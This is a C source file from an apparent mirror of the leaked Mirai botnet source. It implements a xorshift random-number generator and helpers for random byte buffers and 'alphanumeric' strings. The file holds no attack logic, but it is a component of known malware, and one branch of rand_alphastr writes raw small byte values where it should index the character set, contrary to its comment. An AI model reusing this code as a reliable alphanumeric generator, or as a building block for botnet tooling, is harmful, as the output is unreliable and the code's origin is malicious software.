mirror of
https://github.com/jgamblin/Mirai-Source-Code
synced 2025-02-23 06:20:02 +00:00
85 lines
1.7 KiB
C
Executable File
85 lines
1.7 KiB
C
Executable File
#define _GNU_SOURCE
|
|
|
|
#include <stdint.h>
|
|
#include <unistd.h>
|
|
#include <stdlib.h>
|
|
#include <time.h>
|
|
|
|
#include "includes.h"
|
|
#include "rand.h"
|
|
|
|
static uint32_t x, y, z, w;
|
|
|
|
void rand_init(void)
|
|
{
|
|
x = time(NULL);
|
|
y = getpid() ^ getppid();
|
|
z = clock();
|
|
w = z ^ y;
|
|
}
|
|
|
|
uint32_t rand_next(void) //period 2^96-1
|
|
{
|
|
uint32_t t = x;
|
|
t ^= t << 11;
|
|
t ^= t >> 8;
|
|
x = y; y = z; z = w;
|
|
w ^= w >> 19;
|
|
w ^= t;
|
|
return w;
|
|
}
|
|
|
|
void rand_str(char *str, int len) // Generate random buffer (not alphanumeric!) of length len
|
|
{
|
|
while (len > 0)
|
|
{
|
|
if (len >= 4)
|
|
{
|
|
*((uint32_t *)str) = rand_next();
|
|
str += sizeof (uint32_t);
|
|
len -= sizeof (uint32_t);
|
|
}
|
|
else if (len >= 2)
|
|
{
|
|
*((uint16_t *)str) = rand_next() & 0xFFFF;
|
|
str += sizeof (uint16_t);
|
|
len -= sizeof (uint16_t);
|
|
}
|
|
else
|
|
{
|
|
*str++ = rand_next() & 0xFF;
|
|
len--;
|
|
}
|
|
}
|
|
}
|
|
|
|
void rand_alphastr(uint8_t *str, int len) // Random alphanumeric string, more expensive than rand_str
|
|
{
|
|
const char alphaset[] = "abcdefghijklmnopqrstuvw012345678";
|
|
|
|
while (len > 0)
|
|
{
|
|
if (len >= sizeof (uint32_t))
|
|
{
|
|
int i;
|
|
uint32_t entropy = rand_next();
|
|
|
|
for (i = 0; i < sizeof (uint32_t); i++)
|
|
{
|
|
uint8_t tmp = entropy & 0xff;
|
|
|
|
entropy = entropy >> 8;
|
|
tmp = tmp >> 3;
|
|
|
|
*str++ = alphaset[tmp];
|
|
}
|
|
len -= sizeof (uint32_t);
|
|
}
|
|
else
|
|
{
|
|
*str++ = rand_next() % (sizeof (alphaset));
|
|
len--;
|
|
}
|
|
}
|
|
}
|